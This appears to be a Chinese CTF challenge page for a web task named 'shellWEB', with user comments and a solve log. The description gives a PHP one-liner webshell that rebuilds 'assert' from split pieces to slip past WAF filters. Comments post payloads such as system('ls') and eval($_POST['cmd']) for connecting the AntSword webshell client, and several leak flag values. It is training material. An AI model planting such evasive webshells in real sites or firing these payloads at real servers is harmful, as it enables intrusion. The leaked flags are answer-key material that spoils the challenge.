shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8723
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
freestyle 1年前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 0

000ooo 1年前

?s=eval+($_POST['123'])

回复 2

ruien 1年前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 1年前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 1年前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 1年前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 1年前

?s=eval($_POST["cmd"])

回复 0

15824777912 1年前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

whitenul 1年前

flag{9fd11e2660d3ad1f535e9f1de957424a}

回复 0

InfoSec 1年前

这里的?s=print_r(scandir('./'))是一个GET请求参数,通过GET方式传递给服务器。当服务器执行上述代码时,会调用PHP函数scandir()来列出当前目录下的所有文件和文件夹,并通过print_r()函数将这些目录内容打印输出到页面上。

回复 2

WriteUp

image
harry

3 金币

评分(10)

解题动态

qn9301 攻破了该题 11小时前
wsx68696 攻破了该题 11小时前
atctf 攻破了该题 11小时前
lipingctf 攻破了该题 12小时前
cykai999 攻破了该题 16小时前
河马 攻破了该题 20小时前
jvfnvd.vl 攻破了该题 21小时前
xong_bai 攻破了该题 1天前
999哲111 攻破了该题 1天前
qianhuan 攻破了该题 1天前
15620346617 攻破了该题 2天前
3145145 攻破了该题 2天前
gc 攻破了该题 2天前
Warp 攻破了该题 2天前
bugku0521 攻破了该题 2天前
1606143712 攻破了该题 3天前
zrlht 攻破了该题 3天前
多米今天犯错了没 攻破了该题 3天前
kramin 攻破了该题 3天前
ciphercici 攻破了该题 3天前
问题反馈